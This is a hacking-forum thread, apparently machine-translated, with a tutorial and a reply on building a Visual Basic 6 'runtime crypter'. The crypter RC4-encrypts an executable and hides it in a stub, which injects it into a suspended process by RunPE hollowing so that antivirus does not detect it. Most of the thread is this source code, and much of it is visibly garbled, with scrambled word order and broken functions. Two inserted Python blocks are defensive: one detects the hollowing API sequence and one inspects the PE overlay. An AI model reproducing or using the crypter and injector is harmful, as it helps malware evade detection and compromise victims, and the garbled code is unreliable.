| | █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█ | |
Administrator
| Subject: █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█ Sat Nov 19, 2011 3:50 am | |
| Well, in this tutorial I will explain how to make your own runtime crypter. The crypter is not FUD, but that's not my point here. I just want to show what a runtime crypter is. If you are not familiar with Visual Basic 6, read some basic guidance on how to use it first, so that you do not face any problems following this tutorial. So let's get started. For this runtime crypter we need to make two projects: the first project is the crypter, and the second project is the stub.
1. The Crypter: Open a new project and put several components on it. We need a textbox, two command buttons and a common dialog. Set the following in their properties:
- Text1; Text = box which is the file path to encrypt
- Command1; Caption = Button that calls the file to encrypt
- Command2; Caption = Button to encrypt
- CommonDialog1; paste it anywhere in the form

PS: If you cannot find the CommonDialog, make sure you have added it to the components.
And the form would look like this.
Now double-click Command1, and add these commands.
- Code:
-
With CommonDialog1 . DialogTitle = "Select The file you Want to Protect" . Filter = "exe Files | *. exe" . ShowOpen End With
If Not CommonDialog1.FileName = vbNullString Then
Text1.Text = CommonDialog1.FileName
End If
Double click Next Command2 and add these commands. - Code:
-
As String Dim Stub
Open App.Path & "\ Stub.exe 'For As # 1 Binary Stub = Space (LOF (1)) Get # 1,, Stub Close # 1
With CommonDialog1
. DialogTitle = "Select Where You Want to Save Crypted File" . Filter = "EXE Files | *. exe" . ShowSave
End With
Dim File As String
Open Text1.Text For Binary As # 1 File = Space (LOF (1)) Get # 1, File Close # 1
File = RC4 (File, "therefenge)
CommonDialog1.FileName Open For Binary As # 1 Put # 1, Stub & "[Theref]" & File Close # 1
MsgBox "Crypted Successfully", vbInformation
Ok, then you will see codes Command2 Command1 and now we have to RC4 function somewhere, copy this code below Command1 or Command2.
- Code:
-
Public Function RC4 (ByVal Data As String, ByVal Password As String) As String 'This is a Modified Function RC4 ^ ^ On Error Resume Next Dim F (0 To 255) As Integer, X, Y As Long, Key () As Byte Key () = StrConv (Password, vbFromUnicode) For X = 0 To 255 Y = (Y + F (X) + Key (X Mod Len (Password))) Mod 256 F (X) = X X Next Key () = StrConv (Data, vbFromUnicode) For X = 0 To Len (Data) Y = (Y + F (AND) + 1) Mod 256 Key (X) = Key (X) XOR F (Temp + F ((Y + F (Y)) Mod 254)) X Next RC4 = StrConv (Key, vbUnicode) End Function ******* Well, we finished the client.******* ******* Now we have to make the Stub.******* 2. Stub:Ok, open a new project. And eliminate the form1 and you do not need any kind in our crypter. And add 2 modules in it. The first module will be the main The second module is the module RunPE And will look like.
[You must be registered and logged in to see this image.] Now, double-click the second module, and put in the form RunPE the following code. - Code:
-
Option Explicit
CONTEXT_FULL As Long Private Const = & H10007 Private Const MAX_PATH As Integer = 260 CREATE_SUSPENDED As Long Private Const = & H4 MEM_COMMIT As Long Private Const = & H1000 MEM_RESERVE As Long Private Const = & H2000 PAGE_EXECUTE_READWRITE As Long Private Const = & H40
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugString" (ByVal lpOutputString As String) As Long
Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long) Private Declare Function CallWindowProc Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
Type Private SECURITY_ATTRIBUTES nLength As Long As Long lpSecurityDescriptor As Long bInheritHandle End Type
Type Private STARTUPINFO cb As Long As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute dwFlags As Long wShowWindow As Integer cbReserved2 As Integer As Long lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError End Type
Type Private PROCESS_INFORMATION hProcess As Long hThread As Long As Long dwProcessId As Long dwThreadId End Type
Type Private FLOATING_SAVE_AREA As Long ControlWord As Long StatusWord As Long TagWord As Long ErrorOffset As Long ErrorSelector As Long DataOffset As Long DataSelector RegisterArea (1 To 80) As Byte As Long Cr0NpxState End Type
Type Private CONTEXT As Long ContextFlags
As Long DR0 Dr1 As Long Dr2 As Long As Long dr3 As Long DR6 As Long DR7
As FloatSave FLOATING_SAVE_AREA As Long SegGs As Long SegFs As Long SEGESA As Long SegDs Edi As Long Esi As Long As Long ebx As Long edx As Long ecx As Long eax As Long ebp As Long eip As Long SegCs As Long EFLAGS As Long GMT As Long SegSs End Type
Type Private IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res (0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2 (0 To 9) As Integer As Long e_lfanew Type End
Type Private IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer As Long TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols SizeOfOptionalHeader As Integer características As Integer End Type
Type Private IMAGE_DATA_DIRECTORY As Long VirtualAddress Size As Long End Type
Type Private IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte As Long SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData 'NT Additional fields. ImageBase As Long As Long SectionAlignment As Long FileAlignment MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer As Long W32VersionValue As Long SizeOfImage As Long SizeOfHeaders CheckSum As Long SubSystem As Integer DllCharacteristics As Integer As Long SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes DataDirectory (0 To 15) As IMAGE_DATA_DIRECTORY End Type
Type Private IMAGE_NT_HEADERS Signature As Long As FileHeader IMAGE_FILE_HEADER As OptionalHeader IMAGE_OPTIONAL_HEADER End Type
Type Private IMAGE_SECTION_HEADER SecName As String * 8 As Long VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers NumberOfRelocations As Integer NumberOfLinenumbers As Integer As Long características End Type
CallAPI Private Function (ByVal slib As String, ByVal smod As String, ParamArray Params ()) As Long As Long Dim LPTR Dim bvASM (& HEC00 & - 1) As Byte Dim i As Long As Long Dim LMOD
LMOD = GetProcAddress (LoadLibraryA (SLIB), smod) If LMOD = 0 Then Exit Function
LPTR = VarPtr (bvASM (0)) ByVal RtlMoveMemory LPTR, & H59595958, & H4: LPTR = LPTR + 4 ByVal RtlMoveMemory LPTR, & H5059, & H2: LPTR LPTR + 2 = For i = UBound (Params) To 0 Step -1 ByVal RtlMoveMemory LPTR, & H68, & H1: LPTR LPTR + 1 = ByVal RtlMoveMemory LPTR, CLng (Params (i)), & H4: LPTR LPTR + 4 = Next ByVal RtlMoveMemory LPTR, & HE8, & H1: LPTR LPTR + 1 = ByVal RtlMoveMemory LPTR, LMOD - LPTR - 4, & H4: LPTR LPTR + 4 = ByVal RtlMoveMemory LPTR, & HC3, & H1: LPTR LPTR + 1 = CallAPI = CallWindowProc (VarPtr (bvASM (0)), 0, 0, 0, 0), End Function
Injec Sub (ByVal sHost As String, ByRef bvBuff () As Byte, Parameter As String) Dim i As Long IHDP Dim As IMAGE_DOS_HEADER Dim As IMAGE_NT_HEADERS Pinho Pish Dim As IMAGE_SECTION_HEADER If Dim As STARTUPINFO Dim Pi As PROCESS_INFORMATION Ctx Dim As CONTEXT
Si.cb = Len (Si)
IHDP RtlMoveMemory, bvBuff (0), 64 RtlMoveMemory Pinho, bvBuff (Pidh.e_lfanew), 248
CreateProcessA sHost, "" & parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi CallAPI "ntdll", "NtUnmapViewOfSection" Pi.hProcess, Pinh.OptionalHeader.ImageBase CallAPI "kernel32" "VirtualAllocEx" Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT MEM_RESERVE Or, PAGE_EXECUTE_READWRITE WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase, bvBuff (0), Pinh.OptionalHeader.SizeOfHeaders, 0
For i = 0 To Pinh.FileHeader.NumberOfSections - 1 Pish RtlMoveMemory, bvBuff (Pidh.e_lfanew + 248 + 40 * i), Len (Pish) WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, bvBuff (Pish.PointerToRawData) Pish.SizeOfRawData, 0 Next i
Ctx.ContextFlags = CONTEXT_FULL CallAPI "kernel32", "GetThreadContext" Pi.hThread, VarPtr (Ctx) WriteProcessMemory Pi.hProcess, ByVal Ctx.Ebx + 8, Pinh.OptionalHeader.ImageBase, 4, 0 Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint CallAPI "kernel32", "SetThreadContext" Pi.hThread, VarPtr (Ctx) CallAPI "kernel32", "ResumeThread" Pi.hThread Sub End
StrToBytArray Public Function (ByVal SSTR As String) As Byte () Dim i As Long Dim Buffer () As Byte ReDim Buffer (Len (SSTR) - 1) For i = 1 To Len (SSTR) Buffer (i - 1) = Asc (Mid (SSTR, i, 1)) Next i StrToBytArray = Buffer End Function
ThisExe Public Function () As String As Long Dim LRET Dim bvBuff (255) As Byte CallAPI LRET = ("kernel32", "GetModuleFileNameA" App.hInstance, VarPtr (bvBuff (0)), 256) ThisExe $ = Left (StrConv (bvBuff, vbUnicode) LRET) End Function Put these codes in the first module. - Code:
-
Sub Main ()
As String Dim SHIT
SHIT = App.Path & "\" & App.EXEName & ". Exe"
Dim Data As String
SHIT Open For Binary As # 1
Data = Space (LOF (1)) Get # 1,, Data Close # 1
Dim Delimiter () As String
Delimiter () = Split (Data, "[Theref]")
Delimiter (1) = RC4 (Delimiter (1), "therefenge)
Injec Call (SHIT, StrConv (Delimiter (1), vbFromUnicode), vbNullString),
End Sub
Public Function RC4 (ByVal Data As String, ByVal Password As String) As String 'This is a Modified Function RC4 ^ ^ On Error Resume Next Dim F (0 To 255) As Integer, X, Y As Long, Key () As Byte Key () = StrConv (Password, vbFromUnicode) For X = 0 To 255 Y = (Y + F (X) + Key (X Mod Len (Password))) Mod 256 F (X) = X X Next Key () = StrConv (Data, vbFromUnicode) For X = 0 To Len (Data) Y = (Y + F (Y) + 1) Mod 256 Key (X) = Key (X) XOR F (Temp + F ((Y + F (Y)) Mod 254)) X Next RC4 = StrConv (Key, vbUnicode) End Function Note that the "Sub Main ()" is the first thing the Stub will do when it runs. Therefore, it should be the crypter and Stub in the same directory. Now, compile the crypter in Crypter.exe (or Etc.exe), but you have to compile the stub as Stub.exe (Just take out the script that needs crypter "Stub.exe"). Having collected all of them, place them in a folder.
Woah! You just made your own runtime crypter. It's all for now, then the stub is left modear Rump or find a less burnt this to be less detected stub... | |
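For detection engineering, the stub's `Injec` routine above is recognisable by the order of its API calls. The following is an added example, not part of the original post: it scans an API trace per calling PID for that ordered sequence, using the `CREATE_SUSPENDED` and `PAGE_EXECUTE_READWRITE` values from the post. The `pid=... api=... key=value` log format and the sample trace are constructed assumptions, not the output of any real sandbox.

```python
import re

# API order used by the stub's Injec routine in the post above
SEQUENCE = ["CreateProcessA", "NtUnmapViewOfSection", "VirtualAllocEx",
            "WriteProcessMemory", "SetThreadContext", "ResumeThread"]
CREATE_SUSPENDED = 0x4
PAGE_EXECUTE_READWRITE = 0x40
LINE = re.compile(r"pid=(\d+) api=(\w+)(?: (.*))?$")  # hypothetical trace format

def parse(line):
    """Split one trace line into (pid, api, {arg: value}) or None."""
    m = LINE.match(line.strip())
    if not m:
        return None
    args = dict(kv.split("=", 1) for kv in (m.group(3) or "").split() if "=" in kv)
    return int(m.group(1)), m.group(2), args

def hollowing_pids(lines):
    """Return PIDs whose calls walk the whole SEQUENCE in order."""
    progress, hits = {}, []          # pid -> index of the next expected API
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        pid, api, args = rec
        step = progress.get(pid, 0)
        if step >= len(SEQUENCE) or api != SEQUENCE[step]:
            continue                 # repeated or unrelated call: ignore
        if api == "CreateProcessA" and not int(args.get("flags", "0"), 16) & CREATE_SUSPENDED:
            continue                 # child was not started suspended
        if api == "VirtualAllocEx" and int(args.get("protect", "0"), 16) != PAGE_EXECUTE_READWRITE:
            continue
        progress[pid] = step + 1
        if progress[pid] == len(SEQUENCE):
            hits.append(pid)
    return hits

# Constructed sample trace: PID 4120 follows the pattern, PID 3300 does not.
SAMPLE_TRACE = """\
pid=4120 api=CreateProcessA flags=0x4 image=sample.exe
pid=3300 api=CreateProcessA flags=0x0 image=notepad.exe
pid=4120 api=NtUnmapViewOfSection base=0x400000
pid=4120 api=VirtualAllocEx base=0x400000 protect=0x40
pid=4120 api=WriteProcessMemory size=0x400
pid=3300 api=WriteProcessMemory size=0x10
pid=4120 api=WriteProcessMemory size=0x2000
pid=4120 api=GetThreadContext
pid=4120 api=SetThreadContext
pid=3300 api=ResumeThread
pid=4120 api=ResumeThread
""".splitlines()
```
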
| | | pum4 Member
| Subject: Re: █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█ Fri Mar 09, 2012 12:35 am | |
| button 2 code is bad
As String Dim Stub
Open App.Path & "\ Stub.Exe 'For As # 1 Binary Stub = Space (LOF (1)) Get # 1,, Stub Close # 1
With CommonDialog1
. DialogTitle = "Select Where You Want To Save Crypted File" . Filter = "EXE Files | *. Exe" . ShowSave
End With
Dim File As String
Open Text1.Text For Binary As # 1 File = Space (LOF (1)) Get # 1, File Close # 1
File = RC4 (File, "Therefenge)
CommonDialog1.FileName Open For Binary As # 1 Put # 1, Stub & "[Theref]" & File Close # 1
MsgBox "Crypted Successfully", VbInformation | |
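The button 2 code in this thread writes its output as the stub, then the `[Theref]` delimiter, then the encrypted file, so the payload sits in the PE overlay (data past the last section). The following is an added example for analysts, not part of either post: it locates the overlay, looks for the delimiter there and measures the entropy of what follows. The function names and the sample image are constructed for illustration.

```python
import math
import struct

MARKER = b"[Theref]"  # delimiter written between stub and payload on this page

def overlay_offset(pe: bytes) -> int:
    """File offset of the first byte past the last PE section (the overlay)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (nsections,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # first IMAGE_SECTION_HEADER
    end = table + 40 * nsections
    for i in range(nsections):
        raw_size, raw_ptr = struct.unpack_from("<II", pe, table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end

def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; ciphertext sits close to 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)

def inspect(pe: bytes) -> dict:
    start = overlay_offset(pe)
    overlay = pe[start:]
    # Search only the overlay: the stub itself may hold the marker as a string.
    pos = overlay.find(MARKER)
    payload = overlay[pos + len(MARKER):] if pos >= 0 else b""
    return {"overlay_size": len(overlay),
            "marker_at": start + pos if pos >= 0 else None,
            "payload_entropy": round(entropy(payload), 2),
            "suspicious": pos >= 0 and len(payload) > 0}

def sample_stub() -> bytes:
    """Constructed one-section PE image, for demonstration only."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    sect = b".text\0\0\0" + struct.pack("<IIIIIIHHI", 0x100, 0x1000, 0x200,
                                        0x200, 0, 0, 0, 0, 0x60000020)
    return (dos + coff + b"\0" * 0xE0 + sect).ljust(0x200, b"\0") + b"\x90" * 0x200
```
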